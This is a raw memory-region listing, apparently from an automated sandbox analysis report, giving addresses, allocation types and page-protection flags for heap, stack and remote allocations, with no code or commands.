26D5F1B7000
heap
page execute and read and write
F572DFE000
stack
page read and write
DE25000
direct allocation
page execute and read and write
1D9962C5000
heap
page read and write
1D9961C7000
heap
page read and write
1D996912000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
1D996198000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
1D996163000
heap
page read and write
8620000
direct allocation
page read and write
2CDD000
trusted library allocation
page execute and read and write
24F30000
direct allocation
page read and write
32EE000
unkown
page read and write
7FF848FCA000
trusted library allocation
page read and write
281C0000
trusted library allocation
page read and write
281A3000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
281D7000
trusted library allocation
page read and write
1D996919000
heap
page read and write
7FF848E2B000
trusted library allocation
page read and write
26D46A00000
trusted library allocation
page read and write
1A9B1BB4000
heap
page read and write
2DAB000
heap
page read and write
1D9962ED000
heap
page read and write
1D996307000
heap
page read and write
281A0000
trusted library allocation
page read and write
33E0000
heap
page read and write
26D47514000
trusted library allocation
page read and write
27AE0000
trusted library allocation
page read and write
7FF848E12000
trusted library allocation
page read and write
1D996A2A000
heap
page read and write
C50000
heap
page read and write
281DE000
trusted library allocation
page read and write
26D47109000
trusted library allocation
page read and write
D40000
direct allocation
page read and write
822C000
stack
page read and write
9910000
direct allocation
page read and write
7360000
heap
page execute and read and write
A34000
trusted library allocation
page read and write
6D0D000
stack
page read and write
1D9961B0000
heap
page read and write
26D470FD000
trusted library allocation
page read and write
1D994259000
heap
page read and write
AFA000
heap
page read and write
26D4711E000
trusted library allocation
page read and write
25250000
heap
page read and write
33D0000
heap
page read and write
281C0000
trusted library allocation
page read and write
4C98000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
9890000
direct allocation
page read and write
5565000
remote allocation
page execute and read and write
32F0000
heap
page read and write
1D996922000
heap
page read and write
BB2000
heap
page read and write
6E4C000
stack
page read and write
26D5F0B2000
heap
page read and write
7490000
trusted library allocation
page read and write
2740E000
stack
page read and write
1D9961F3000
heap
page read and write
468E000
stack
page read and write
1D9962ED000
heap
page read and write
28270000
trusted library allocation
page read and write
5729000
trusted library allocation
page read and write
26D5EFD0000
heap
page read and write
AD8000
heap
page read and write
1D996930000
heap
page read and write
8E25000
direct allocation
page execute and read and write
F5727FF000
stack
page read and write
281A0000
trusted library allocation
page read and write
B72000
heap
page read and write
F5728FE000
stack
page read and write
1D9961EE000
heap
page read and write
281B0000
trusted library allocation
page read and write
26D46D06000
trusted library allocation
page read and write
B807000
trusted library allocation
page read and write
CA33DFF000
stack
page read and write
25370000
trusted library allocation
page read and write
98B0000
direct allocation
page read and write
2FF0000
heap
page read and write
F572E7B000
stack
page read and write
27AE0000
trusted library allocation
page read and write
1D9965C3000
heap
page read and write
27510000
trusted library allocation
page read and write
1D9964F0000
heap
page read and write
26D5F1E0000
heap
page read and write
2C90000
heap
page read and write
281E0000
trusted library allocation
page read and write
279FE000
stack
page read and write
26D48A4E000
trusted library allocation
page read and write
2B92000
heap
page read and write
2C25000
heap
page read and write
26D48A61000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
27580000
heap
page read and write
B6F000
heap
page read and write
82D0000
heap
page read and write
27520000
trusted library allocation
page read and write
2D6E000
stack
page read and write
CA33AFF000
stack
page read and write
2CC0000
trusted library allocation
page read and write
F5723FE000
stack
page read and write
281C0000
trusted library allocation
page read and write
279BF000
stack
page read and write
CA337FF000
stack
page read and write
1D99612C000
heap
page read and write
1D99615B000
heap
page read and write
1D99691E000
heap
page read and write
3404000
heap
page read and write
7310000
trusted library allocation
page read and write
250A0000
remote allocation
page read and write
98E0000
direct allocation
page read and write
26D44FED000
heap
page read and write
1D9961EE000
heap
page read and write
1D99693D000
heap
page read and write
28200000
trusted library allocation
page read and write
1D9943E0000
remote allocation
page read and write
281B0000
trusted library allocation
page read and write
8050000
trusted library allocation
page execute and read and write
85C0000
trusted library allocation
page read and write
2ADE000
stack
page read and write
281B0000
trusted library allocation
page read and write
25240000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
2815E000
stack
page read and write
281C0000
trusted library allocation
page read and write
33EC000
heap
page read and write
7F47000
stack
page read and write
28230000
trusted library allocation
page read and write
8D10000
direct allocation
page execute and read and write
1D994140000
heap
page read and write
281A0000
trusted library allocation
page read and write
28220000
trusted library allocation
page read and write
98A0000
direct allocation
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
7317000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page execute and read and write
8333000
heap
page read and write
1D99691E000
heap
page read and write
1D996187000
heap
page read and write
72A5000
heap
page read and write
1D9961A8000
heap
page read and write
7DF4E4460000
trusted library allocation
page execute and read and write
281A0000
trusted library allocation
page read and write
2CD0000
trusted library allocation
page read and write
27410000
heap
page read and write
1D996908000
heap
page read and write
1D9961EE000
heap
page read and write
1D9962F1000
heap
page read and write
7F60000
trusted library allocation
page execute and read and write
281E0000
trusted library allocation
page read and write
24E5E000
stack
page read and write
72AE000
heap
page read and write
4620000
trusted library allocation
page read and write
1D9960F8000
heap
page read and write
1D99614E000
heap
page read and write
8309000
heap
page read and write
D425000
direct allocation
page execute and read and write
BA7000
heap
page read and write
8765000
remote allocation
page execute and read and write
252B0000
trusted library allocation
page read and write
28200000
trusted library allocation
page read and write
1D996905000
heap
page read and write
26D4502F000
heap
page read and write
26D45210000
heap
page read and write
1A9B191A000
heap
page read and write
460E000
stack
page read and write
2529F000
stack
page read and write
1D9961D3000
heap
page read and write
26D45215000
heap
page read and write
F5738CD000
stack
page read and write
26D47170000
trusted library allocation
page read and write
3280000
heap
page read and write
74F0000
trusted library allocation
page read and write
281E0000
trusted library allocation
page read and write
26D56C81000
trusted library allocation
page read and write
2EBD000
stack
page read and write
1D996102000
heap
page read and write
2CB0000
trusted library section
page read and write
46F8000
heap
page read and write
1D9961E8000
heap
page read and write
27520000
trusted library allocation
page read and write
26D46AD0000
heap
page read and write
1D99616C000
heap
page read and write
CA25000
direct allocation
page execute and read and write
281C0000
trusted library allocation
page read and write
1D99629D000
heap
page read and write
1D996184000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
A6B000
trusted library allocation
page execute and read and write
281A3000
trusted library allocation
page read and write
2848E000
stack
page read and write
878000
stack
page read and write
7FF848EC6000
trusted library allocation
page read and write
1D99610D000
heap
page read and write
F57394B000
stack
page read and write
6965000
remote allocation
page execute and read and write
281A0000
trusted library allocation
page read and write
1D996193000
heap
page read and write
A62000
trusted library allocation
page read and write
1D99612A000
heap
page read and write
1D9962ED000
heap
page read and write
27A9D000
stack
page read and write
1D996307000
heap
page read and write
27AE0000
trusted library allocation
page read and write
2FEF000
stack
page read and write
AD0000
heap
page read and write
2830D000
trusted library allocation
page read and write
B72000
heap
page read and write
70E2000
heap
page read and write
80D5000
trusted library allocation
page read and write
1D99615E000
heap
page read and write
1D99617C000
heap
page read and write
26391000
trusted library allocation
page read and write
2CD4000
trusted library allocation
page read and write
82F5000
heap
page read and write
27ADE000
stack
page read and write
36D0000
heap
page read and write
CA332F9000
stack
page read and write
2513F000
stack
page read and write
7530000
trusted library allocation
page read and write
26D46EA6000
trusted library allocation
page read and write
1D9961EE000
heap
page read and write
1D9962DA000
heap
page read and write
A4D000
trusted library allocation
page execute and read and write
2819E000
stack
page read and write
3380000
heap
page read and write
1D996126000
heap
page read and write
7550000
trusted library allocation
page read and write
7FF848FC1000
trusted library allocation
page read and write
32A0000
heap
page read and write
2797D000
stack
page read and write
4165000
remote allocation
page execute and read and write
28200000
trusted library allocation
page read and write
8600000
trusted library allocation
page read and write
2CF0000
trusted library allocation
page read and write
1D9961B8000
heap
page read and write
327E000
unkown
page read and write
26D44F80000
heap
page read and write
82AE000
stack
page read and write
7378000
trusted library allocation
page read and write
273CC000
stack
page read and write
8305000
heap
page read and write
2C22000
heap
page read and write
1D9962DA000
heap
page read and write
281A0000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
263B9000
trusted library allocation
page read and write
1D9941C0000
heap
page read and write
8F0000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
A30000
trusted library allocation
page read and write
26D46A70000
trusted library allocation
page read and write
281C0000
trusted library allocation
page read and write
CA338FB000
stack
page read and write
281E0000
trusted library allocation
page read and write
25419000
trusted library allocation
page read and write
26D5EFC5000
heap
page read and write
1D9963E9000
heap
page read and write
1D9962FF000
heap
page read and write
2754E000
trusted library allocation
page read and write
351E000
stack
page read and write
281B2000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
27544000
trusted library allocation
page read and write
8530000
trusted library allocation
page read and write
1D9964FA000
heap
page read and write
281B0000
trusted library allocation
page read and write
1D996915000
heap
page read and write
26D474FD000
trusted library allocation
page read and write
1D9962DA000
heap
page read and write
2A9E000
stack
page read and write
28200000
trusted library allocation
page read and write
576A000
trusted library allocation
page read and write
361F000
stack
page read and write
26D451D0000
heap
page read and write
27510000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
26D48CC5000
trusted library allocation
page read and write
28200000
trusted library allocation
page read and write
250A0000
remote allocation
page read and write
281A1000
trusted library allocation
page read and write
2755E000
trusted library allocation
page read and write
740E000
stack
page read and write
CA33BFD000
stack
page read and write
6CC0000
direct allocation
page read and write
1D9961EE000
heap
page read and write
1D9962DA000
heap
page read and write
1D996305000
heap
page read and write
1D994259000
heap
page read and write
F572B7B000
stack
page read and write
2FAE000
stack
page read and write
1D99691E000
heap
page read and write
9957000
heap
page read and write
7F70000
trusted library allocation
page read and write
28290000
trusted library allocation
page read and write
28200000
trusted library allocation
page read and write
44FAFF000
stack
page read and write
26D4710D000
trusted library allocation
page read and write
1D9962E0000
heap
page read and write
26D47133000
trusted library allocation
page read and write
28270000
trusted library allocation
page read and write
274B8000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
281E0000
trusted library allocation
page read and write
1D99693D000
heap
page read and write
9920000
direct allocation
page read and write
826E000
stack
page read and write
25380000
heap
page execute and read and write
26D469E0000
trusted library allocation
page read and write
7F50000
heap
page read and write
276FC000
stack
page read and write
281A0000
trusted library allocation
page read and write
252A0000
trusted library allocation
page read and write
F57384E000
stack
page read and write
281B0000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
1D996245000
heap
page read and write
1D996167000
heap
page read and write
1D996231000
heap
page read and write
28200000
trusted library allocation
page read and write
24F7E000
stack
page read and write
26D48A7B000
trusted library allocation
page read and write
1D996237000
heap
page read and write
F572CFE000
stack
page read and write
2B50000
heap
page read and write
27467000
heap
page read and write
281D7000
trusted library allocation
page read and write
1D996156000
heap
page read and write
281A0000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
1D99639A000
heap
page read and write
1D996932000
heap
page read and write
2B1E000
stack
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
1D9962FF000
heap
page read and write
6B7E000
stack
page read and write
26D44FA0000
heap
page read and write
D50000
direct allocation
page read and write
8040000
heap
page read and write
28200000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
26D474CB000
trusted library allocation
page read and write
1D99642F000
heap
page read and write
281B0000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
1D994428000
heap
page read and write
6AFF000
stack
page read and write
1D9962C5000
heap
page read and write
71E0000
heap
page read and write
1D9962DA000
heap
page read and write
803E000
stack
page read and write
28300000
trusted library allocation
page read and write
1D99693D000
heap
page read and write
27552000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
281F0000
trusted library allocation
page read and write
274F4000
heap
page read and write
F57297E000
stack
page read and write
1D99442B000
heap
page read and write
1D9962FC000
heap
page read and write
4763000
trusted library allocation
page read and write
5F65000
remote allocation
page execute and read and write
82F0000
heap
page read and write
4610000
trusted library allocation
page execute and read and write
A65000
trusted library allocation
page execute and read and write
74D0000
trusted library allocation
page read and write
24E1E000
stack
page read and write
7320000
trusted library allocation
page read and write
1D996279000
heap
page read and write
6C80000
direct allocation
page read and write
7F80000
trusted library allocation
page read and write
46A0000
heap
page execute and read and write
281B0000
trusted library allocation
page read and write
1D996116000
heap
page read and write
9E0000
heap
page read and write
1D996399000
heap
page read and write
72E0000
trusted library allocation
page read and write
6E60000
heap
page read and write
28200000
trusted library allocation
page read and write
1D99614B000
heap
page read and write
281A0000
trusted library allocation
page read and write
1A9B1910000
heap
page read and write
BD0000
heap
page read and write
281B0000
trusted library allocation
page read and write
253E1000
trusted library allocation
page read and write
28200000
trusted library allocation
page read and write
4C7E000
trusted library allocation
page read and write
1D9962ED000
heap
page read and write
281B0000
trusted library allocation
page read and write
CA33EFB000
stack
page read and write
26D44FE7000
heap
page read and write
250A0000
remote allocation
page read and write
26D48A4A000
trusted library allocation
page read and write
2811E000
stack
page read and write
2B85000
heap
page read and write
1D9962E0000
heap
page read and write
281B0000
trusted library allocation
page read and write
281C0000
trusted library allocation
page read and write
34B8000
heap
page read and write
CA339FC000
stack
page read and write
1D9962A1000
heap
page read and write
376F000
stack
page read and write
B6A000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
26D46C81000
trusted library allocation
page read and write
1D9962BA000
heap
page read and write
8100000
trusted library allocation
page read and write
2D00000
trusted library allocation
page read and write
25425000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
44F8FD000
stack
page read and write
281A0000
trusted library allocation
page read and write
1D996418000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
26D48A27000
trusted library allocation
page read and write
27528000
trusted library allocation
page read and write
281C0000
trusted library allocation
page read and write
253CF000
trusted library allocation
page read and write
6DCA000
stack
page read and write
281B0000
trusted library allocation
page read and write
F5729FE000
stack
page read and write
281C0000
trusted library allocation
page read and write
9D9000
heap
page read and write
281F0000
trusted library allocation
page read and write
26D5F1C0000
heap
page read and write
281B0000
trusted library allocation
page execute and read and write
8060000
trusted library allocation
page read and write
26D5F026000
heap
page read and write
281B0000
trusted library allocation
page read and write
4050000
remote allocation
page execute and read and write
1D9962DA000
heap
page read and write
1D9968F1000
heap
page read and write
1D996A2A000
heap
page read and write
1D996174000
heap
page read and write
F572BF9000
stack
page read and write
26D5F2F3000
heap
page read and write
1D99622D000
heap
page read and write
1D996259000
heap
page read and write
1D9962C5000
heap
page read and write
281D0000
trusted library allocation
page read and write
281E0000
trusted library allocation
page read and write
27520000
trusted library allocation
page read and write
7370000
trusted library allocation
page read and write
1D994420000
heap
page read and write
1D9962E0000
heap
page read and write
28200000
trusted library allocation
page read and write
A67000
trusted library allocation
page execute and read and write
70BE000
stack
page read and write
2F60000
heap
page read and write
1D99693D000
heap
page read and write
26D451D5000
heap
page read and write
24BA0000
heap
page read and write
28280000
trusted library allocation
page read and write
6C70000
direct allocation
page read and write
1D9962DB000
heap
page read and write
1D9961C0000
heap
page read and write
28200000
trusted library allocation
page read and write
80F0000
trusted library allocation
page execute and read and write
1D9941BF000
heap
page read and write
1A9B1A10000
heap
page read and write
1D9961BB000
heap
page read and write
A52000
trusted library allocation
page read and write
2CD3000
trusted library allocation
page execute and read and write
BAE000
heap
page read and write
6C0D000
stack
page read and write
2BD2000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
24C2E000
stack
page read and write
26D56F7B000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
1D9960F0000
heap
page read and write
1D994110000
heap
page read and write
281B0000
trusted library allocation
page read and write
CA334FE000
stack
page read and write
B1B000
heap
page read and write
1A9B1BB0000
heap
page read and write
44F9FF000
unkown
page read and write
281A0000
trusted library allocation
page read and write
274B8000
heap
page read and write
281D0000
trusted library allocation
page read and write
1D996904000
heap
page read and write
31D0000
heap
page read and write
28210000
trusted library allocation
page read and write
9860000
direct allocation
page read and write
27AE0000
trusted library allocation
page read and write
281D0000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
26D46AE4000
heap
page read and write
281B0000
trusted library allocation
page read and write
2754B000
trusted library allocation
page read and write
26D44FAC000
heap
page read and write
3398000
heap
page read and write
27A3E000
stack
page read and write
1D9962E0000
heap
page read and write
74A0000
trusted library allocation
page execute and read and write
251BA000
stack
page read and write
CA336FE000
stack
page read and write
281A0000
trusted library allocation
page read and write
26D47105000
trusted library allocation
page read and write
1D996190000
heap
page read and write
C20000
heap
page read and write
1D9962C5000
heap
page read and write
281A0000
trusted library allocation
page read and write
24F20000
direct allocation
page read and write
1D994190000
heap
page read and write
9950000
heap
page read and write
98C0000
direct allocation
page read and write
1D99693D000
heap
page read and write
84EE000
stack
page read and write
1D99693D000
heap
page read and write
26D474C3000
trusted library allocation
page read and write
28200000
trusted library allocation
page read and write
2500D000
stack
page read and write
B625000
direct allocation
page execute and read and write
1D9961D8000
heap
page read and write
F572AF6000
stack
page read and write
26D5F07A000
heap
page read and write
26D474D1000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
4C80000
trusted library allocation
page read and write
26D469C0000
trusted library allocation
page read and write
A40000
trusted library allocation
page read and write
46F0000
heap
page read and write
6D4A000
stack
page read and write
26D451E0000
heap
page read and write
281A0000
trusted library allocation
page read and write
26D47F20000
trusted library allocation
page read and write
1D996266000
heap
page read and write
25140000
heap
page read and write
27443000
heap
page read and write
28120000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1D99641F000
heap
page read and write
27AE0000
trusted library allocation
page read and write
281E0000
trusted library allocation
page read and write
1D9961DB000
heap
page read and write
26D474E5000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
282A0000
trusted library allocation
page read and write
1D9941C0000
heap
page read and write
1D99630A000
heap
page read and write
2DFD000
stack
page read and write
281B0000
trusted library allocation
page read and write
3160000
heap
page read and write
1D9961F0000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
281F0000
trusted library allocation
page read and write
305D000
stack
page read and write
26D56C90000
trusted library allocation
page read and write
9D0000
heap
page read and write
85D0000
trusted library allocation
page read and write
1A9B1BB5000
heap
page read and write
5701000
trusted library allocation
page read and write
F5739CB000
stack
page read and write
7520000
trusted library allocation
page read and write
1D996932000
heap
page read and write
253C5000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
1D9961D0000
heap
page read and write
28290000
trusted library allocation
page read and write
F57287C000
stack
page read and write
281B0000
trusted library allocation
page read and write
852C000
stack
page read and write
1D99619B000
heap
page read and write
281A0000
trusted library allocation
page read and write
24BED000
stack
page read and write
458E000
stack
page read and write
9825000
direct allocation
page execute and read and write
1D99612F000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
1D996A29000
heap
page read and write
9165000
remote allocation
page execute and read and write
26D44FEB000
heap
page read and write
7F940000
trusted library allocation
page execute and read and write
281A0000
trusted library allocation
page read and write
1D99634A000
heap
page read and write
27482000
heap
page read and write
281A0000
trusted library allocation
page read and write
1D9962ED000
heap
page read and write
7F990000
trusted library allocation
page execute and read and write
281C0000
trusted library allocation
page read and write
1D9961B3000
heap
page read and write
281B0000
trusted library allocation
page read and write
BC3000
heap
page read and write
281E0000
trusted library allocation
page read and write
26D5F1E3000
heap
page read and write
1D996902000
heap
page read and write
26D4508A000
heap
page read and write
26D5F367000
heap
page read and write
281A0000
trusted library allocation
page read and write
7FF849150000
trusted library allocation
page read and write
1D9962C5000
heap
page read and write
1D99613F000
heap
page read and write
A70000
trusted library allocation
page execute and read and write
27546000
trusted library allocation
page read and write
1D9962A6000
heap
page read and write
281A1000
trusted library allocation
page read and write
25391000
trusted library allocation
page read and write
7FF848FF2000
trusted library allocation
page read and write
1D9960F1000
heap
page read and write
7340000
trusted library allocation
page read and write
26D48539000
trusted library allocation
page read and write
1D99612D000
heap
page read and write
24F00000
direct allocation
page read and write
9900000
direct allocation
page read and write
281A0000
trusted library allocation
page read and write
75BB000
stack
page read and write
2D88000
trusted library allocation
page read and write
1D9941CF000
heap
page read and write
27AED000
trusted library allocation
page read and write
B6A000
heap
page read and write
98D0000
direct allocation
page read and write
276BC000
stack
page read and write
1D99691A000
heap
page read and write
72CE000
heap
page read and write
31C0000
heap
page read and write
8660000
direct allocation
page read and write
7FF849040000
trusted library allocation
page read and write
1D99627B000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
1D9965C3000
heap
page read and write
1D9964F1000
heap
page read and write
27449000
heap
page read and write
1D9962C5000
heap
page read and write
7350000
trusted library allocation
page read and write
1D994198000
heap
page read and write
2523E000
stack
page read and write
26D5EFE7000
heap
page read and write
1D9962BA000
heap
page read and write
1D9962F0000
heap
page read and write
26D5F301000
heap
page read and write
27510000
trusted library allocation
page read and write
1D9962C5000
heap
page read and write
1D9960F3000
heap
page read and write
281E0000
trusted library allocation
page read and write
2541B000
trusted library allocation
page read and write
4701000
trusted library allocation
page read and write
2B5D000
heap
page read and write
28200000
trusted library allocation
page read and write
281E0000
trusted library allocation
page read and write
26D48AB9000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
26D56CA1000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1D99691E000
heap
page read and write
F572A78000
stack
page read and write
8650000
direct allocation
page read and write
1D996105000
heap
page read and write
1A9B1750000
heap
page read and write
1D996111000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
4857000
trusted library allocation
page read and write
1D99631E000
heap
page read and write
1D9943E0000
remote allocation
page read and write
1D996142000
heap
page read and write
34B0000
heap
page read and write
74B0000
trusted library allocation
page read and write
274B8000
heap
page read and write
281C0000
trusted library allocation
page read and write
253DD000
trusted library allocation
page read and write
6E0E000
stack
page read and write
BA8000
heap
page read and write
26D45170000
heap
page read and write
28270000
trusted library allocation
page read and write
744E000
stack
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
26D48AD0000
trusted library allocation
page read and write
281D0000
trusted library allocation
page read and write
24EF0000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
1D996302000
heap
page read and write
82B0000
heap
page read and write
282B0000
trusted library allocation
page execute and read and write
7570000
trusted library allocation
page read and write
26D5EFDA000
heap
page read and write
C40000
heap
page readonly
7FF849000000
trusted library allocation
page execute and read and write
1D996105000
heap
page read and write
27561000
trusted library allocation
page read and write
46B0000
heap
page read and write
26D48BEF000
trusted library allocation
page read and write
26D48A46000
trusted library allocation
page read and write
2504E000
stack
page read and write
1D996222000
heap
page read and write
281A0000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
1D99617F000
heap
page read and write
281A0000
trusted library allocation
page read and write
26D5F5E0000
heap
page read and write
1D9961EE000
heap
page read and write
1D996268000
heap
page read and write
2756D000
trusted library allocation
page read and write
24CAC000
stack
page read and write
28200000
trusted library allocation
page read and write
27530000
heap
page execute and read and write
33AE000
unkown
page read and write
6C50000
direct allocation
page read and write
27566000
trusted library allocation
page read and write
24FBF000
stack
page read and write
7FF849170000
trusted library allocation
page read and write
8348000
heap
page read and write
1D9962E0000
heap
page read and write
282FE000
stack
page read and write
72C1000
heap
page read and write
28290000
trusted library allocation
page read and write
9850000
direct allocation
page read and write
281C0000
trusted library allocation
page read and write
85E0000
trusted library allocation
page execute and read and write
281D0000
trusted library allocation
page read and write
26D5F1B0000
heap
page execute and read and write
7FFD000
stack
page read and write
1D996296000
heap
page read and write
8610000
direct allocation
page read and write
281B0000
trusted library allocation
page read and write
AC25000
direct allocation
page execute and read and write
26D470FA000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
26D46A30000
trusted library allocation
page read and write
281D0000
trusted library allocation
page read and write
1D996305000
heap
page read and write
BA8000
heap
page read and write
CA333FE000
stack
page read and write
24C6D000
stack
page read and write
46A5000
heap
page execute and read and write
26D48B6C000
trusted library allocation
page read and write
1D996399000
heap
page read and write
281A0000
trusted library allocation
page read and write
2BF1000
heap
page read and write
A20000
trusted library allocation
page read and write
1D99693D000
heap
page read and write
F572D7E000
stack
page read and write
281A0000
trusted library allocation
page read and write
26D46C70000
heap
page execute and read and write
1D9962A1000
heap
page read and write
1D996257000
heap
page read and write
280DE000
stack
page read and write
26D5F353000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
1D9968FE000
heap
page read and write
358F000
unkown
page read and write
1D9962E0000
heap
page read and write
281C0000
trusted library allocation
page read and write
1D996120000
heap
page read and write
1D99612C000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
2CE0000
trusted library allocation
page read and write
A3D000
trusted library allocation
page execute and read and write
6CB0000
direct allocation
page read and write
1D99642F000
heap
page read and write
26D5EFC0000
heap
page read and write
281E0000
trusted library allocation
page read and write
6CA0000
direct allocation
page read and write
59AE000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
1D996272000
heap
page read and write
333E000
stack
page read and write
1D99616F000
heap
page read and write
3390000
heap
page read and write
281A0000
trusted library allocation
page read and write
26D5F130000
heap
page execute and read and write
1D99629D000
heap
page read and write
71E9000
heap
page read and write
1D99610A000
heap
page read and write
6E50000
heap
page read and write
3406000
heap
page read and write
1D9960FD000
heap
page read and write
27AE0000
trusted library allocation
page read and write
27510000
trusted library allocation
page read and write
1D9962BA000
heap
page read and write
26D47520000
trusted library allocation
page read and write
1D99626D000
heap
page read and write
6C4B000
stack
page read and write
9930000
direct allocation
page read and write
4B65000
remote allocation
page execute and read and write
4630000
heap
page execute and read and write
1D9961EE000
heap
page read and write
6ABE000
stack
page read and write
1D9962A1000
heap
page read and write
26D469F0000
heap
page readonly
1D99636E000
heap
page read and write
83C000
stack
page read and write
857E000
stack
page read and write
1D99613A000
heap
page read and write
281B0000
trusted library allocation
page read and write
2EFD000
stack
page read and write
1D9962C5000
heap
page read and write
1D99693D000
heap
page read and write
7500000
trusted library allocation
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
26D5EFC2000
heap
page read and write
6C60000
direct allocation
page read and write
281B0000
trusted library allocation
page read and write
A5A000
trusted library allocation
page execute and read and write
26D45190000
heap
page read and write
26D48A3B000
trusted library allocation
page read and write
27540000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
1D9962ED000
heap
page read and write
C55000
heap
page read and write
26D474BB000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
1D99630E000
heap
page read and write
1D9968F8000
heap
page read and write
9870000
direct allocation
page read and write
6B3E000
stack
page read and write
2D70000
heap
page readonly
5711000
trusted library allocation
page read and write
2DA0000
heap
page read and write
8630000
direct allocation
page read and write
24F10000
direct allocation
page read and write
281B0000
trusted library allocation
page read and write
1A9B1830000
heap
page read and write
1D9960FC000
heap
page read and write
81EC000
stack
page read and write
281B0000
trusted library allocation
page read and write
1D996255000
heap
page read and write
1D99611E000
heap
page read and write
74E0000
trusted library allocation
page read and write
3660000
heap
page read and write
2542B000
trusted library allocation
page read and write
334F000
stack
page read and write
7FF849130000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
251F9000
stack
page read and write
281A0000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
26D56F6D000
trusted library allocation
page read and write
2742D000
heap
page read and write
1D996121000
heap
page read and write
2D20000
trusted library allocation
page read and write
1D9961C4000
heap
page read and write
1A9B1850000
heap
page read and write
25170000
direct allocation
page read and write
1D996908000
heap
page read and write
26D474C5000
trusted library allocation
page read and write
748D000
stack
page read and write
27572000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
B3B000
heap
page read and write
250FE000
stack
page read and write
281B0000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
26D47504000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
28490000
trusted library allocation
page read and write
7D65000
remote allocation
page execute and read and write
98F0000
direct allocation
page read and write
252C0000
heap
page read and write
25160000
direct allocation
page read and write
There are 992 hidden memdumps, click here to show them.